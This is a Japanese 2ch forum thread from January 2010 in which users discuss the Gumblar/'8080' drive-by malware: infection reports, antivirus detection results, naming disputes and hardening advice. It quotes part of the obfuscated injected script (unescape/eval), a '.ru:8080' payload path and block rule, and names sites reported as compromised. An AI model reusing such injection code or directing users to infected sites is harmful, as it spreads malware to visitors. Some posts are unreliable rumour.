その後、各社(Macfee,NOD2,MSE,Kasper)の全スキャンにも引っかからず、netstat -a で見てももどこにもつなぎに行ってない。
Windows XPは Windows Updateで最新状態だったが、Acrobatは8だったのに。
で、>>356や>>360を見て、もしかしてNOD32は改竄されたHTMLの<script>の文字列パターンや .ru:8080 のサイト名ではなく、
その次の .jsファイルのダウンロードの時点で検知・遮断するのかなと。
すると、次に奥さんが別PCで見ても.jsファイルがNOT FOUNDなら感染しなかったのも合点がいくんだなぁ。
いずれにしても早く、明確な感染確認の方法が出てくれればありがたい。
いっそFFFTPをインストールして、自前サイトのID/PWでもセットしておくかなw
0438名無しさん@お腹いっぱい。
2010/01/07(木) 11:08:430439名無しさん@お腹いっぱい。
2010/01/07(木) 11:11:20さっさと穴埋めとけ
0440名無しさん@お腹いっぱい。
2010/01/07(木) 11:19:50一応未然に防いで削除(移動)出来たようだけど、ほんとに大丈夫なのかな?
たった今1日がかりでWindowsのクリーンインストールしたばっかなんだけど
0441名無しさん@お腹いっぱい。
2010/01/07(木) 11:24:53どのスレだったかCファイル破壊コードとか書かれていたし
0442名無しさん@お腹いっぱい。
2010/01/07(木) 11:24:590443名無しさん@お腹いっぱい。
2010/01/07(木) 11:34:360444名無しさん@お腹いっぱい。
2010/01/07(木) 11:41:220445名無しさん@お腹いっぱい。
2010/01/07(木) 11:47:300446名無しさん@お腹いっぱい。
2010/01/07(木) 11:48:090447440
2010/01/07(木) 11:53:28自分Live2ch使ってるんですが、そのスレ見たらAvastが検出して、その後Avastの履歴見たらLive2chが書かれていました
自分も良く分からないのですが
誤検出ですかね?
0448名無しさん@お腹いっぱい。
2010/01/07(木) 11:55:340449名無しさん@お腹いっぱい。
2010/01/07(木) 11:56:30検出に誤検出もなにもない。
0450名無しさん@お腹いっぱい。
2010/01/07(木) 11:57:010451名無しさん@お腹いっぱい。
2010/01/07(木) 12:01:26誤検出はあるだろ
0452名無しさん@お腹いっぱい。
2010/01/07(木) 12:02:390453名無しさん@お腹いっぱい。
2010/01/07(木) 12:05:02今話題のGumblarってのはサイトを見ただけで感染するようですが
0454名無しさん@お腹いっぱい。
2010/01/07(木) 12:17:52うつったかも
0455名無しさん@お腹いっぱい。
2010/01/07(木) 12:29:080456名無しさん@お腹いっぱい。
2010/01/07(木) 12:32:440457名無しさん@お腹いっぱい。
2010/01/07(木) 12:44:51PC雑誌の熟読には自信があります。
私の豊富なテストと経験からすればKaspersky Internet Security 2010が最もおすすめです。
2010ではBehavior BlockerやHIPSに加えて仮想実行スペースも搭載されたのでGumblar
(日本の通称ではGENOウイルス)パターンでもバッチリ防げます。
0458名無しさん@お腹いっぱい。
2010/01/07(木) 12:47:440459名無しさん@お腹いっぱい。
2010/01/07(木) 12:48:13Kaspersky Internet Security 2010
これは、買わないといけないね!
0460名無しさん@お腹いっぱい。
2010/01/07(木) 13:04:100461名無しさん@お腹いっぱい。
2010/01/07(木) 13:18:440462名無しさん@お腹いっぱい。
2010/01/07(木) 13:30:43http://pc11.2ch.net/linux/ > GZ > file.htm JS/TrojanDownloader.Agent.NRL トロイの木馬
0463名無しさん@お腹いっぱい。
2010/01/07(木) 15:14:14まだ名前ないのか?
0464名無しさん@お腹いっぱい。
2010/01/07(木) 15:16:540465名無しさん@お腹いっぱい。
2010/01/07(木) 16:37:20http://tsushima.2ch.net/test/read.cgi/news/1262843094/
>弊社の「採用ホームページ」が第三者による不正アクセスにより改ざんされ、
〜
>2.対象期間
>2009年12月15日 1:00 〜 2010年1月5日 15:00
ローソンと一緒か
0466名無しさん@お腹いっぱい。
2010/01/07(木) 16:53:19わたしのとこは絶対大丈夫! うぇぇwwwwWw
え〜と
どれどれ
/*GNU GPL*/ ・・・ (°◇°;)
0467名無しさん@お腹いっぱい。
2010/01/07(木) 17:17:22偶然?
0468名無しさん@お腹いっぱい。
2010/01/07(木) 17:22:500469名無しさん@お腹いっぱい。
2010/01/07(木) 17:23:060470名無しさん@お腹いっぱい。
2010/01/07(木) 17:25:250471名無しさん@お腹いっぱい。
2010/01/07(木) 17:31:27画像系の直リンにセキュリティソフトが反応しているdけで
専ブラという箱庭世界内ではスレに貼られている有害リンクを直接踏んでWEBブラウザで開かない限りは
120%感染はあり得ません
janeやIE系のlive2chはもちろん、全ての2chブラウザに共通
0472名無しさん@お腹いっぱい。
2010/01/07(木) 17:49:020473名無しさん@お腹いっぱい。
2010/01/07(木) 17:53:22あったとしても利用されてない
0474名無しさん@お腹いっぱい。
2010/01/07(木) 17:54:46反応するのはコードのコピペ
後は画像サムネイル機能を持った外部ページからの経由ではこれに反応するかもしれないって程度
0475名無しさん@お腹いっぱい。
2010/01/07(木) 17:55:360476名無しさん@お腹いっぱい。
2010/01/07(木) 19:16:49リンク貼るヤツより遥かにマシ
0477名無しさん@お腹いっぱい。
2010/01/07(木) 19:21:30どっちも糞で馬鹿なのには違いない。
0478名無しさん@お腹いっぱい。
2010/01/07(木) 19:43:56某大学のHP陥落が関係していると思われ。
0479名無しさん@お腹いっぱい。
2010/01/07(木) 19:49:17サイバーテロですね。
0480名無しさん@お腹いっぱい。
2010/01/07(木) 20:32:16結局どうなのこのGENOだかGumblarだか言うウィルスって
0481名無しさん@お腹いっぱい。
2010/01/07(木) 20:33:000482名無しさん@お腹いっぱい。
2010/01/07(木) 20:34:43セキュアブレインの先端技術研究所の調査によれば、
2009年度第2四半期(2009年7月〜9月)と
第3四半期(2009年10月〜12月)を比較すると、
「Gumblarウイルス」によるWebサイトの改ざん被害の件数は、
約4倍の上昇となっている。
12月に発見された「Gumblarウイルス」によって
改ざんされたWebサイト336件のうち、127件(37.8%)の被害サイトは、
企業のWebサイトとの情報もある。
http://www.rbbtoday.com/news/20100107/64816.html
途中の文を切ってますがかなり増えてるみたいですね。
0483名無しさん@お腹いっぱい。
2010/01/07(木) 20:38:15ガンブラーウイルスについての誤った情報にご注意ください。
ttp://blogs.yahoo.co.jp/noooo_spam/59368027.html
0484名無しさん@お腹いっぱい。
2010/01/07(木) 20:57:310485名無しさん@お腹いっぱい。
2010/01/07(木) 21:02:080486名無しさん@お腹いっぱい。
2010/01/07(木) 21:08:03tp://break24●nl/
</head><script language=javascript><!--
〜中略〜
POF=unescape(f5DJz);eval(POF)})(/&/g);
--></script>
<body>
0487名無しさん@お腹いっぱい。
2010/01/07(木) 21:13:490488名無しさん@お腹いっぱい。
2010/01/07(木) 21:20:26それは豚汁
0489名無しさん@お腹いっぱい。
2010/01/07(木) 21:23:27あんたに聞きたい
なぜ8080と呼称するのをそこまで嫌がるの?
Gumblarと明確に違うものなのだから便宜上8080って呼んでも良いじゃないの
ってかマスコミがGumblarって名で広め過ぎてて各個人ブログもちょっと混乱気味・・・
0490名無しさん@お腹いっぱい。
2010/01/07(木) 21:27:15ポートじゃわかりにくいし勘違いするやつもいるだろうしな
0491名無しさん@お腹いっぱい。
2010/01/07(木) 21:29:23早く正式名称決めないとヤバイと思うよ、これ。
今回広範囲に被害が広がったのは、GENOと同じ物だと思って対策してなかった人も多いと思う。
対策方法が違うし、とりあえず8080でいいんじゃないの?
0492名無しさん@お腹いっぱい。
2010/01/07(木) 21:32:07くだらねえことでこだわるなよ
0493名無しさん@お腹いっぱい。
2010/01/07(木) 21:32:08今のところ発見当初から変わってない特徴が8080ポート指定ってとこなんだから、別に問題ないと思うけど?
どんな勘違いするんだ??
スクリプトなり仕込んでくる実行ファイルは変化してるし、「GNU GPL」は「CODE1」に変化した経歴があるし・・・
0494名無しさん@お腹いっぱい。
2010/01/07(木) 21:34:22Gumblar直系の亜種としてGumblar.xってのがあるんだよ
そこに8080が食い込んできたからこのスレがGENOスレ発祥で出来たんだけど、マスコミがGumblarで統一しちゃったせいで
あっちのスレにも8080の改竄報告がいったりしてる
0495名無しさん@お腹いっぱい。
2010/01/07(木) 21:34:50ちがったっけ
そうならruでもいいな
ロシアンガンブラーでいいよ
0496名無しさん@お腹いっぱい。
2010/01/07(木) 21:35:30だからなんだよ
しつけえな
くだらねえ
0497名無しさん@お腹いっぱい。
2010/01/07(木) 21:37:51別に亜種は複数合っても良いんだよ
似たような種類だし分かりやすくて良いよ
まあ有名どころのベンダーが適当に付けた名前が定着するだろうけど
0498名無しさん@お腹いっぱい。
2010/01/07(木) 21:40:16嫌ならGENOスレでやってくれ
0499名無しさん@お腹いっぱい。
2010/01/07(木) 21:41:348080なんて普通に使うポート
無知なだけ
0500名無しさん@お腹いっぱい。
2010/01/07(木) 21:43:380501名無しさん@お腹いっぱい。
2010/01/07(木) 21:45:16世間でガンブラーらなそれで良いだろ
間違いとか言うなよ
0502名無しさん@お腹いっぱい。
2010/01/07(木) 21:51:14良くないから感染が広がったんじゃないかと
Gumblar8080とかかっこよくね?
0503名無しさん@お腹いっぱい。
2010/01/07(木) 21:51:50でも今のこのごちゃ混ぜ状態で何が起こってるかって言ったら、8080で感染したのにGumblarってだけでGENOウイルスチェッカーが
未だに使えると思ってる奴が居たり、初代Gumblar(GENOとよく言われた奴)の感染確認方法で確認できると思ってる奴が居たり・・・
どっかベンダーが改めて名前つけてくれたら良いのに・・・ベンダー共通の名前つけよう云々ってどうなったんだ
0504名無しさん@お腹いっぱい。
2010/01/07(木) 21:59:16ウェブ改竄の被害を楽しんでるだけかな
0505名無しさん@お腹いっぱい。
2010/01/07(木) 22:06:368080で詐欺紛いもやってるみたいだけどね>>424
まあコード書き換えれば感染PCをボットネット化するようなこともできるだろうし、金にしようと思えばどうにでもなるな
0506名無しさん@お腹いっぱい。
2010/01/07(木) 22:09:16DOS攻撃やらなにやらでサイバーテロも起こせるだろ?
金になるとしてもかなり危険だと思うがな
0507名無しさん@お腹いっぱい。
2010/01/07(木) 22:10:350508名無しさん@お腹いっぱい。
2010/01/07(木) 22:23:06ブラウザで判定できたらいいのにっておもう
0509名無しさん@お腹いっぱい。
2010/01/07(木) 22:28:42そんなことより、使ってるソフトのアップデートを的確にやって既知の脆弱性を埋める&最新のウイルス対策ソフトの常駐の徹底が
一番効果的かと
0510名無しさん@お腹いっぱい。
2010/01/07(木) 22:28:48そんなこと無いから同じ
0511名無しさん@お腹いっぱい。
2010/01/07(木) 22:30:040512名無しさん@お腹いっぱい。
2010/01/07(木) 22:39:26で、この流れでNoScriptの話題に振ると、暴れる粘着が居るという・・・
まあなんだ、IEなら信頼済みサイトゾーンの有効活用、FirefoxならNoScript導入、Operaならサーバーマネージャ使うか
No More Scriptsっていうブックマークレット使うか・・・こんな書き方で良い?w
0513名無しさん@お腹いっぱい。
2010/01/07(木) 22:41:28jsの内容が難読処理されてたら、実行しないとか、中国ロシアのサイトに飛ばす内容は実行しないとか
ウイルスソフトの判定の前にブラウザで判定できたら、2段ガマエになって、よりいいんじゃないかと思っただけ。
ウイルスソフトに任せきりが嫌なんだよ。どこまでちゃんと見てるかわかりづらいから。
0514名無しさん@お腹いっぱい。
2010/01/07(木) 22:43:530515名無しさん@お腹いっぱい。
2010/01/07(木) 22:51:240516名無しさん@お腹いっぱい。
2010/01/07(木) 22:51:31そんな機能ブラウザに標準搭載したら、正常なサイトまで表示崩れたり、真っ白ってことになりかねんか?
外部の奴がアドオンで作るならまだ現実味があるが、ブラウザベンダー自体が付けるような機能には思えん
そこまで心配なら、真っ新な状態の仮想化環境でブラウジングがお勧め
0517名無しさん@お腹いっぱい。
2010/01/07(木) 22:59:570518名無しさん@お腹いっぱい。
2010/01/07(木) 23:04:54ブラウザベンダーがつけてこそ、そのブラウザの信用やシェアが上がったりしないかな。
まあ現実的ではないと思うけど
0519名無しさん@お腹いっぱい。
2010/01/07(木) 23:17:43逆に否定意見が結構集まる気がするw
まあ最新バージョンのブラウザはどこもフィッシング対策との名目で何かしらのフィルタリング機能入ってるから、そこに期待するしかないんじゃ
ないかな
と言っても、実際改竄されてるページをブロックできてたり、対応が早いかっていうと・・・
結局は環境を常に最新に、ウイルス対策ソフトも最新に(ただし過信は禁物)ってとこに落ち着く
0520名無しさん@お腹いっぱい。
2010/01/07(木) 23:31:10Web改鼠は結果でしかなくて、インターネットの開発者は皆どこかしらの違法結社に属していて
ウイルス漬けにされているという現実が露呈した格好だ
0521名無しさん@お腹いっぱい。
2010/01/07(木) 23:40:390522名無しさん@お腹いっぱい。
2010/01/07(木) 23:48:19ブログパーツを使ったサイトで改ざんされたらしい
流出事件といいこのサイトはだめぽ
0523名無しさん@お腹いっぱい。
2010/01/07(木) 23:49:10ttp://www.zenoah.co.jp/
0524名無しさん@お腹いっぱい。
2010/01/07(木) 23:49:240525名無しさん@お腹いっぱい。
2010/01/07(木) 23:56:22ノートン先生に怒られた
0526名無しさん@お腹いっぱい。
2010/01/07(木) 23:56:24Kaspersky
Internet Security 2010
アクセスが禁止されました
要求されたURLのWebページを表示できません
URL:
http://www.zenoah.co.jp/
このWebページはウイルスに感染しています
次のウイルスが見つかりました: Trojan-Downloader.JS.Agent.ewh
情報:
23:55:06
Kaspersky Internet Security 2010
0527名無しさん@お腹いっぱい。
2010/01/07(木) 23:59:51いつものだね
0528名無しさん@お腹いっぱい。
2010/01/08(金) 00:00:15*** 危険なサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ***
危険かもしれないってアドレスも含むぞ
0529名無しさん@お腹いっぱい。
2010/01/08(金) 00:02:42アバストタンにも怒られた
0530名無しさん@お腹いっぱい。
2010/01/08(金) 00:09:370531名無しさん@お腹いっぱい。
2010/01/08(金) 00:11:38アホもいるだろうけど
0532名無しさん@お腹いっぱい。
2010/01/08(金) 00:12:40自己責任だけどね
0533名無しさん@お腹いっぱい。
2010/01/08(金) 00:13:08オンラインソースチェッカーがなくなったのが辛い
0534名無しさん@お腹いっぱい。
2010/01/08(金) 00:21:05バーチャルなら余裕だべ
0535名無しさん@お腹いっぱい。
2010/01/08(金) 00:29:20これを機にネットは怖いという意識が強くなって90年代半ばくらいのネット人口に戻ったりしないものか
0536名無しさん@お腹いっぱい。
2010/01/08(金) 00:37:400537名無しさん@お腹いっぱい。
2010/01/08(金) 00:38:46それほど怖くもないだろ
0538名無しさん@お腹いっぱい。
2010/01/08(金) 00:39:270539名無しさん@お腹いっぱい。
2010/01/08(金) 00:41:33一部の人間が騒ぐことになるだけ
mixiとかが感染媒体になれば大騒ぎになるだろうけど携帯メインの層は気にもとめないだろう
0540名無しさん@お腹いっぱい。
2010/01/08(金) 00:46:31http://tsushima.2ch.net/test/read.cgi/news/1262865452/
0541名無しさん@お腹いっぱい。
2010/01/08(金) 01:08:28/*LGPL*/
ちょっと変わってるぞ
>>529
あれ? こっちでは反応ない
0542名無しさん@お腹いっぱい。
2010/01/08(金) 01:12:26スクリプトにはどこも反応しないみたいだね
ttp://www.virustotal.com/jp/analisis/9e032adbec239b778cd4e14405953799185c6c7f1f35fe90531c944efc2f0787-1262880649
0543541
2010/01/08(金) 01:22:17新型スクリプトみたいだな
検出できるのはノートンの侵入検知くらいかも
avast!にはスクリプトの検体を提出しておこう
0544名無しさん@お腹いっぱい。
2010/01/08(金) 01:29:57えっ
さっきトロイがどうとかいいながら発狂して何かを遮断したんだが
0545名無しさん@お腹いっぱい。
2010/01/08(金) 01:38:45標準シールドとWebシールド(高)で使っているんだが
時間差で書き換えられたか?
定義データも手動で更新して100107-0の最新のはず
スクリプトは提出しておいた
0546名無しさん@お腹いっぱい。
2010/01/08(金) 01:58:14まったく確証のない俺の記憶だが、もしかしたら推測通りこの数分・数時間の間に書き換えられたのかも
0547名無しさん@お腹いっぱい。
2010/01/08(金) 02:43:36http://www.itmedia.co.jp/news/articles/1001/07/news092.html
12月26日午後11時15分、委託先の制作会社が運営管理するブログパーツのサーバが不正アクセスを受け、
プログラムを改ざんされたという。ユーザーからの情報と委託先からの報告で改ざんが発覚。1月6日に
ブログパーツをすべて削除した。
ノートン警察は、シマンテックと共同で昨年9月17日〜12月9日に行った広告キャンペーン。
中川翔子さんの大切なもの「ギザ」をサイバー犯罪グループから守るというストーリー形式で、
ウイルスやトロイの木馬などについても学ぶ内容だったという。
whois見てそこへ報告すた。
届けばいいけど。。。
0549名無しさん@お腹いっぱい。
2010/01/08(金) 02:54:13|http://*.ru:8080/*
で今のところは大丈夫かな
0550名無しさん@お腹いっぱい。
2010/01/08(金) 02:56:26aguseで調べたけど出なかったKasperskyなのに
画像取得日時 2010-01-08 02:53:28
検出されたウイルス(ワーム、スパイウエア)
ウイルス(ワーム、スパイウエア)は検出されませんでした。
0551名無しさん@お腹いっぱい。
2010/01/08(金) 02:59:42/*GNU GPL*/ だぎゃ。。。
0553名無しさん@お腹いっぱい。
2010/01/08(金) 03:02:03GNU GPLだね
0554名無しさん@お腹いっぱい。
2010/01/08(金) 03:08:37ほい、飛び先.ru:8080/pics/win.jpg
ttp://online.us.drweb.com/cache/?i=2c2639efd0815cc02072f39ffcf95712
0556名無しさん@お腹いっぱい。
2010/01/08(金) 03:33:03うちは、インターネット側からは、VPN経由でしかログインできないようにしてるから、
HP制作会社にはVPNクライアントいれてもらってる
仮にFTPアカウントが漏れてもVPNの認証を突破しない限り書き換え不可
0557名無しさん@お腹いっぱい。
2010/01/08(金) 03:34:32http://tsushima.2ch.net/test/read.cgi/news/1262886266/
0558名無しさん@お腹いっぱい。
2010/01/08(金) 03:38:13Webシールドに頼って定義ファイルが手薄だったavastには不吉な予感
0559名無しさん@お腹いっぱい。
2010/01/08(金) 04:00:050560名無しさん@お腹いっぱい。
2010/01/08(金) 04:14:39スクリプト以外は今までと同じっぽいから
スクリプトだけで対応してたアンチウイルスは以外は大丈夫みたいだね
漏れも別の感染のサイトで「/*GNU GPL*/ 」が「/*LGPL*/」に変わったのを確認したお。。。
他もそーなるんだろか…
0562名無しさん@お腹いっぱい。
2010/01/08(金) 04:22:12あちゃー
0565名無しさん@お腹いっぱい。
2010/01/08(金) 04:32:340566名無しさん@お腹いっぱい。
2010/01/08(金) 05:00:21もともと/*LGPL*/じゃなかったの?
俺は初めに見た時から/*LGPL*/だったよ?
カスペは全く反応しなかったよ
新種なの?
「/*GNU GPL*/」
ttp://megalodon.jp/2010-0108-0303-45/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fdr%2Enakamats%2Ecom%2F
「/*LGPL*/」
ttp://megalodon.jp/2010-0108-0426-38/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fdr.nakamats.com%2F
0568名無しさん@お腹いっぱい。
2010/01/08(金) 05:06:43http://www.virustotal.com/jp/analisis/6fa28b2165d271842128a6936c19935674b51ad249d0da8aff224779eeee6bb6-1262894686
どこも検出しない
0569名無しさん@お腹いっぱい。
2010/01/08(金) 05:08:03>>551-553
自分も確認したけどね
メモに控えてある感染サイトも時間ごとに/*LGPL*/に置き換わってる
あきらかに新型スクリプトだな
確認してないがウイルス本体も新型かもな
0571名無しさん@お腹いっぱい。
2010/01/08(金) 05:12:440572名無しさん@お腹いっぱい。
2010/01/08(金) 05:13:32えぐざくとりぃ
多分…
0573名無しさん@お腹いっぱい。
2010/01/08(金) 05:14:10adobe系更新でokだからか?
一般ユーザには実害が無いからか?
春先はちょうど時期的に豚インフルと重なって盛り上がっただけなのか?
この手の騒動に飽きたのか?
0574名無しさん@お腹いっぱい。
2010/01/08(金) 05:14:150576名無しさん@お腹いっぱい。
2010/01/08(金) 05:18:01GENOは起動不可だったり動作が重たかったりで気がつかれる失敗作だから
今回はちゃんと動くバージョンに進化したた言うべきなのか、いやな進化だ
ちょっと重いとかネットワークハブのランプが常にチカチカとか普通の人は気がつかないから怖い
にゃるほど。
初期のものはそーだったのか。
0578名無しさん@お腹いっぱい。
2010/01/08(金) 05:22:53・2ちゃんねるの規制・スレ分割・8080とGumblarと区別できなくて情報が錯綜・感染したか実感がない
などなど考えられることは多数。ってかスレの勢いが盛り上がりの指標とは限らない
正直、感染しましたってだけのレスだけで加速してるのならこれぐらいの勢いで、有用な情報のみ書き込まれる方が良い
>>574
発覚してない脆弱性を使ったゼロデイが使われない限り、今までの対策で問題なし
0579名無しさん@お腹いっぱい。
2010/01/08(金) 05:27:00Gumblarとはまた別物なんだから進化したって訳じゃないだろ。今までのものより厄介な新種が出てきたって言った方が正しくね?
ちなみに初代Gumblarも復活の兆しありとか
0580名無しさん@お腹いっぱい。
2010/01/08(金) 05:27:27前回時にAdobe系のアンスコやアップデートやAcrobat JS切る等の対策は周知されてたわけだから
今回騒いでるのって前回対策取らなかった人達だけだからじゃね
0581名無しさん@お腹いっぱい。
2010/01/08(金) 05:30:36そうだな、8080系と言っておかないと混同してしまうな
ウイルス製作者同士のプライド合戦とか勘弁してほしいよ
0582名無しさん@お腹いっぱい。
2010/01/08(金) 05:30:40水面下で拡大して後々めんどくさい事になるのが怖いんだが…。
0583名無しさん@お腹いっぱい。
2010/01/08(金) 05:33:32あんだけ騒がれてたのにアップデートもしてなかったの?
0584名無しさん@お腹いっぱい。
2010/01/08(金) 05:34:11若い子が多いジャンルや活動が活発じゃないジャンルは放置しっ放しだが
0585名無しさん@お腹いっぱい。
2010/01/08(金) 05:34:12どこのセキュソフトも本格的な対策は取ってないってこと?
0586名無しさん@お腹いっぱい。
2010/01/08(金) 05:40:13まあGumblarと8080系の作った作者orグループが同一人物orグループでないとも言い切れないんじゃないのかな?w
そこら辺どうなってんのかはよく知らんけど、感染経路は似ていても別物であることは確か
>>585
何を以て本格的な対策と言うのか?そりゃスクリプトの時点で検知できなくても、その先で検知する場合もあるだろうし、しないかもしれない
ユーザーができる本格的な対策と言えば、脆弱性のあるソフトのアップデートとReaderのjs切るってこと
そしてウイルス対策ソフトで検知できるから安心だ!とか絶対に思わないこと
0587名無しさん@お腹いっぱい。
2010/01/08(金) 05:44:30いや、Gumblar.xの時はもっとひどくて取得ごとにスクリプトが違ってたから
誤検出を考えると対応が難しいんだと思う
ほぼ確実な検出ができたのはカスペくらいだったはず
0588名無しさん@お腹いっぱい。
2010/01/08(金) 05:52:18ユーザーの対策が出来ていても、htmlに埋め込まれたドロッパーは取り込んでしまうからね。
それに、この調子だとユーザー側の対策なんて、気休め程度になってしまうかもしれない。
JAVAもフラッシュも使えないネットなんて
経済的損失が計り知れなくなるだろう。
0589名無しさん@お腹いっぱい。
2010/01/08(金) 05:55:530590名無しさん@お腹いっぱい。
2010/01/08(金) 05:57:190591名無しさん@お腹いっぱい。
2010/01/08(金) 05:58:040592名無しさん@お腹いっぱい。
2010/01/08(金) 05:58:51偶然引っかかっただけだな
結果: 0/41
ttp://www.virustotal.com/jp/analisis/b51322f52d9926c76479aaadecf5d9a037f2361387e811911b7f83c6a32bc3c8-1262897785
結果: 0/41
ttp://www.virustotal.com/jp/analisis/232d5aa747718a48e4471bdee5a35fd136be15087e7faf69f17a7619dfa8d209-1262897301
結果: 0/41
ttp://www.virustotal.com/jp/analisis/aca66f8d123896d30b71158c6fa451121939d5b5adccdd15c9f7b183fd80b430-1262897643
85 名前: 滑車(東日本)[sage] 投稿日:2010/01/08(金) 05:33:19.37 ID:ERkw5/xM
今>>1のソースをvirustotalにおくったらNOD32だけが反応した
http://tsushima.2ch.net/test/read.cgi/news/1262886266/85-87
0593名無しさん@お腹いっぱい。
2010/01/08(金) 05:59:26>>588はこのことだね。
http://tsushima.2ch.net/test/read.cgi/news/1262886266/85-87n
0594名無しさん@お腹いっぱい。
2010/01/08(金) 06:01:470595名無しさん@お腹いっぱい。
2010/01/08(金) 06:01:49どうやって指令してるのかな?
0596名無しさん@お腹いっぱい。
2010/01/08(金) 06:04:580597名無しさん@お腹いっぱい。
2010/01/08(金) 06:05:22要はどの段階で検知するかの問題
後virustotalでの結果と実製品で違いでる場合がある。ヒューリスティックの違いなのか、HIPSとかとの兼ね合いなのか詳しい事は俺は知らん
でも1つだけ言えることは、このスレはどこのベンダーが良い・悪いとか議論するとこじゃないと思うけど?
製品比較やりたいなら、適当な別スレでどうぞ
0598592
2010/01/08(金) 06:12:34気を悪くしたなら少し控えるか
定義データに左右されないらしいノートンの侵入検知の例もあるしな
0599名無しさん@お腹いっぱい。
2010/01/08(金) 06:16:18いやいや、検証目的としてはぜんぜんおkだし>>592のレス内容を叩いてる訳じゃない。これからもどうぞ続けて下さいw
俺が言いたかったのはただ単に特定のベンダーが良い・悪いとかここですんなよってだけです
紛らわしいタイミングになってサーセン
0600名無しさん@お腹いっぱい。
2010/01/08(金) 06:19:34おk
ではこれからも節度を持った上で貼らせてもらおう
0601名無しさん@お腹いっぱい。
2010/01/08(金) 07:21:170602名無しさん@お腹いっぱい。
2010/01/08(金) 07:43:56ノートンは確信犯だってば
芸能アバターのせい
0603名無しさん@お腹いっぱい。
2010/01/08(金) 08:03:40人間見ないでルールだけ見る奴って何なの?
0604名無しさん@お腹いっぱい。
2010/01/08(金) 08:09:030605名無しさん@お腹いっぱい。
2010/01/08(金) 08:53:47特定のIPアドレスに制限するとか、VPN必須にするとかしないと
0606名無しさん@お腹いっぱい。
2010/01/08(金) 09:25:29なにが?avast!以外大丈夫なのかな?
0607名無しさん@お腹いっぱい。
2010/01/08(金) 09:37:400608名無しさん@お腹いっぱい。
2010/01/08(金) 09:47:27結果: 0/40
ttp://www.virustotal.com/jp/analisis/9c063a80b9be621983142f51b500161003ca8e6b8ce7e3127c249fb1e34b184c-1262904786
avast!Anti-Virus Part120
http://pc11.2ch.net/test/read.cgi/sec/1261930389/448
0609名無しさん@お腹いっぱい。
2010/01/08(金) 09:48:34今回はAdobeが脆弱性を12日(日本時間13日)まで放置してるのが痛すぎる。
0610名無しさん@お腹いっぱい。
2010/01/08(金) 10:27:03年末年始休暇を狙った組織的犯行の模様
サイト運営者もアップデート担当の開発者も休みだろうしな
0611sage ◆sage/xLnlI
2010/01/08(金) 10:28:46('A`)
0612名無しさん@お腹いっぱい。
2010/01/08(金) 11:13:290613名無しさん@お腹いっぱい。
2010/01/08(金) 11:16:200614名無しさん@お腹いっぱい。
2010/01/08(金) 11:18:47FFFTPのレジストリに生で記録されてんのか?
iniに出力するようにしてるんだが、どうだろうか
0615名無しさん@お腹いっぱい。
2010/01/08(金) 11:29:36上に言っても、パスワードは変えられないの一点張り、脳みそがイカれてる
書き換えられるたびにコード削除していくの疲れたよ
0616名無しさん@お腹いっぱい。
2010/01/08(金) 11:30:16FTPソフト側での回避は無理
0617名無しさん@お腹いっぱい。
2010/01/08(金) 11:33:20乙
感染したのは8080?
書き換えられる頻度はどのくらい?
0618名無しさん@お腹いっぱい。
2010/01/08(金) 11:38:49それはありえんw
0619名無しさん@お腹いっぱい。
2010/01/08(金) 11:50:47乙
アホだなー
0620名無しさん@お腹いっぱい。
2010/01/08(金) 11:55:01なんで変えられないんだろう?
感染をもみ消したいのかな?
更に大きな感染呼び込んで信用失うだけだと思うが。
0621sage ◆sage/xLnlI
2010/01/08(金) 12:09:16実験台で見たらコードがなかった・・・
0622名無しさん@お腹いっぱい。
2010/01/08(金) 12:09:31まだ3回くらいだけどね
IDパスばれてるんだから今後もやられるとしたらキツいんだ
今は/*LGPL*/から始まって8!@0@^8)@0?/とか書いてあるから8080だろう
前は/*GNU GPL*/だったな
一部/*GNU GPL*/〜のまま放っておいたものが/*LGPL*/〜に置き換わってた
追記じゃないみたいだね
>>620
全ファイル消去されたら考えも変わるかもね
俺は元データ持ってないから落してエディタで書き換えて再アップ
スクリプト書いて消そうかと思ったけどミスって全消去したら・・・怖いな
0623名無しさん@お腹いっぱい。
2010/01/08(金) 12:11:02なんなのその原始時代みたいな会社w
0625名無しさん@お腹いっぱい。
2010/01/08(金) 12:15:13てういか今後も感染するから出せないかw
0626名無しさん@お腹いっぱい。
2010/01/08(金) 12:15:39実際、原始時代みたいな会社だよ
いくら言っても「スキャンしとけよ、ファイル書き換えておけ」と言われるだけ
セキュリティに何の関心もない様子
去年のGENOもしっかり掛かってたしな、そのときもパス変えてくれって言ったけど今に至る
0627名無しさん@お腹いっぱい。
2010/01/08(金) 12:18:01そういうバカ会社は一回痛い目を見ないと変わらないから
全消去になったほうがいいかもね。
いくら言っても聞かなかったくせに、いざその事態になると泣きつくんだよな。
ほんと氏ねよと思うわw
0628名無しさん@お腹いっぱい。
2010/01/08(金) 12:19:59会社としてやばい
すぐに転職を勧める
0629sage ◆sage/xLnlI
2010/01/08(金) 12:28:39一部の記号を消したらこうなった
0630名無しさん@お腹いっぱい。
2010/01/08(金) 12:33:030631名無しさん@お腹いっぱい。
2010/01/08(金) 12:33:58普通は違うOSを使うと思うんだけどな
0632名無しさん@お腹いっぱい。
2010/01/08(金) 12:34:52Webデザイナのマシンに感染したとか
0633名無しさん@お腹いっぱい。
2010/01/08(金) 12:40:04鯖管とは違くないか
Telnetあるし
0634sage ◆sage/xLnlI
2010/01/08(金) 12:41:51hundekuru
0635名無しさん@お腹いっぱい。
2010/01/08(金) 12:42:21怖くて未知のURLは踏めん・・・
0636名無しさん@お腹いっぱい。
2010/01/08(金) 12:43:32いつの時代だよwww
0637sage ◆sage/xLnlI
2010/01/08(金) 12:43:450638名無しさん@お腹いっぱい。
2010/01/08(金) 12:44:460639名無しさん@お腹いっぱい。
2010/01/08(金) 12:45:22ttp://www.aguse.jp/
0640名無しさん@お腹いっぱい。
2010/01/08(金) 12:48:33そのゲストOS・・・プロダクトキー入れてる?
盗まれるぞ・・・
0641名無しさん@お腹いっぱい。
2010/01/08(金) 12:54:44それってなんでWindows標準FWだと防げないの
既知のアプリの未知のポートだと無理だけど
未知のアプリが通信しようとすればポップアップがあるのは変わらないはずだけど
0642名無しさん@お腹いっぱい。
2010/01/08(金) 13:00:04WindowsファイアウォールAPIってのがあってだな・・・
例外追加等々
0643名無しさん@お腹いっぱい。
2010/01/08(金) 13:12:35MSDNに該当する記事有り
Windows Firewall and Windows Firewall with Advanced Security (Windows)
ttp://msdn.microsoft.com/en-us/library/aa366453(VS.85).aspx
0644sage ◆sage/xLnlI
